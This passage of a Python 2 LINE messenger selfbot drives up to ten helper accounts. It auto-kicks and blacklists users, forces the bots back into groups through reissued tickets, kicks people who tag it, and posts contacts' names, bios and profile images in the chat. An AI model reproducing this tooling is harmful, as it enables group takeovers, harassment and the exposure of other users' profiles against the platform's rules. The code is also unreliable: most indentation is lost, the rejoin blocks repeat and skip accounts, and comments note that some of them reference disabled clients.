            Ti = ki1.reissueGroupTicket(op.param1)
            # re-invite only the logged-in clients; ki3..ki9 are disabled above
            cl.acceptGroupInvitationByTicket(op.param1,Ti)
            time.sleep(0.01)
            ki1.acceptGroupInvitationByTicket(op.param1,Ti)
            time.sleep(0.01)
            ki2.acceptGroupInvitationByTicket(op.param1,Ti)
            time.sleep(0.01)
            ki10.acceptGroupInvitationByTicket(op.param1,Ti)
            X = cl.getGroup(op.param1)
            X.preventJoinByTicket = True
            cl.updateGroup(X)
            Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
        # NOTE: the per-bot rejoin blocks below follow the same pattern as the
        # one above but still reference the disabled ki3..ki9 clients; enable
        # those accounts (or trim the accept ladders) before relying on them.
        if Amid1 in op.param3:
            if op.param2 in Bots:
pass
try:
ki2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ticket = ki1.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid2 in op.param3:
if op.param2 in Bots:
pass
try:
ki3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ticket = ki2.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid3 in op.param3:
if op.param2 in Bots:
pass
try:
ki4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid4 in op.param3:
if op.param2 in Bots:
pass
try:
ki5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ticket = ki4.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid5 in op.param3:
if op.param2 in Bots:
pass
try:
ki6.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ticket = ki5.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid6 in op.param3:
if op.param2 in Bots:
pass
try:
ki7.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = True
ki6.updateGroup(X)
Ticket = ki6.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid7 in op.param3:
if op.param2 in Bots:
pass
try:
ki8.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = True
ki7.updateGroup(X)
Ticket = ki7.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid8 in op.param3:
if op.param2 in Bots:
pass
try:
ki9.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = True
ki8.updateGroup(X)
Ticket = ki8.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid9 in op.param3:
if op.param2 in Bots:
pass
try:
ki10.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = False
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = True
ki9.updateGroup(X)
Ticket = ki9.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid10 in op.param3:
if op.param2 in Bots:
pass
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = False
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = True
ki10.updateGroup(X)
Ticket = ki10.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if op.type == 13:
if mid in op.param3:
if wait["pautoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to, "error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
cl.sendText(msg.to, "[ChatBOT] " + data['result']['response'].encode('utf-8'))
            if 'MENTION' in msg.contentMetadata:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = [cName + "\n" + str(wait["tag1"]) , cName + "\n" + str(wait["tag2"])]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
break
            if 'MENTION' in msg.contentMetadata:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy",cName + ""]
ret_ = "[Auto] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
msg.contentType = 7
msg.text = ''
msg.contentMetadata = {
'STKPKGID': '9662',
'STKTXT': '[]',
'STKVER': '16',
'STKID':'697'
}
cl.sendMessage(msg)
break
            if 'MENTION' in msg.contentMetadata:
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy",cName + " Ngapain Ngetag?",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja","-_-","Alin lagi off", cName + " Kenapa Tag saya?","SPAM PC aja " + cName, "Jangan Suka Tag gua " + cName, "Kamu siapa " + cName + "?", "Ada Perlu apa " + cName + "?","Tenggelamkan tuh yang suka tag pake BOT","Tersummon -_-"]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait["steal"] == True:
_name = msg.contentMetadata["displayName"]
copy = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
print "[Target] Stealed"
break
else:
targets.append(copy)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
wait["steal"] = False
break
except:
pass
if wait["alwayRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
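# op.type 25 is the selfbot pattern: the owner's own outgoing messages are parsed
# as commands by the long elif chain that follows.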
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"Done already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done done aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["คำสั่ง"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + "")
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["คำสั่ง2"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage2 + "")
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["คำสั่ง3"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage3 + "")
else:
cl.sendText(msg.to,helpt)
elif ("Gn:" in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick:" in msg.text:
midd = msg.text.replace("Kick:"," ")
klist=[ki7,ki6,ki5,ki1,cl]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[midd])
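# A second op.type 25 handler: contact messages (contentType 13) sent while one of
# the w/a/b-invite flags is set are treated as invite requests.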
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki1.findAndAddContactsByMid(invite)
ki1.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
if msg.contentType == 13:
if wait['ainvite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki1.sendText(msg.to, _name + " สมาชิกอยู่ในกลุ่มเเล้ว")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki1.findAndAddContactsByMid(target)
ki1.inviteIntoGroup(msg.to,[target])
ki1.sendText(msg.to,"Invite " + _name)
wait['ainvite'] = False
break
except:
ki1.sendText(msg.to,"Error")
wait['ainvite'] = False
break
if msg.contentType == 13:
if wait['binvite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki2.sendText(msg.to, _name + " สมาชิกอยู่ในกลุ่มเเล้ว")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki2.findAndAddContactsByMid(target)
ki2.inviteIntoGroup(msg.to,[target])
ki2.sendText(msg.to,"Invite " + _name)
wait['binvite'] = False
break
except:
ki2.sendText(msg.to,"Error")
wait['binvite'] = False
break
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif msg.text.lower() == 'บอท':
    for amid in [Amid1, Amid2, Amid3, Amid4, Amid5, Amid6, Amid7, Amid8, Amid9, Amid10]:
        msg.contentType = 13
        msg.contentMetadata = {'mid': amid}
        cl.sendMessage(msg)
elif msg.text.lower() == '#บอท':
    for bot, amid in [(ki1,Amid1),(ki2,Amid2),(ki3,Amid3),(ki4,Amid4),(ki5,Amid5),
                      (ki6,Amid6),(ki7,Amid7),(ki8,Amid8),(ki9,Amid9),(ki10,Amid10)]:
        msg.contentType = 13
        msg.contentMetadata = {'mid': amid}
        bot.sendMessage(msg)
elif "คท" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif "vdo:" in msg.text.lower():
if msg.toType == 2:
query = msg.text.split(":")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'ยูทูป ' in msg.text:
try:
textToSearch = (msg.text).replace('ยูทูป ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
elif msg.text in ["55","555"]:
msg.contentType = 7
msg.text = None
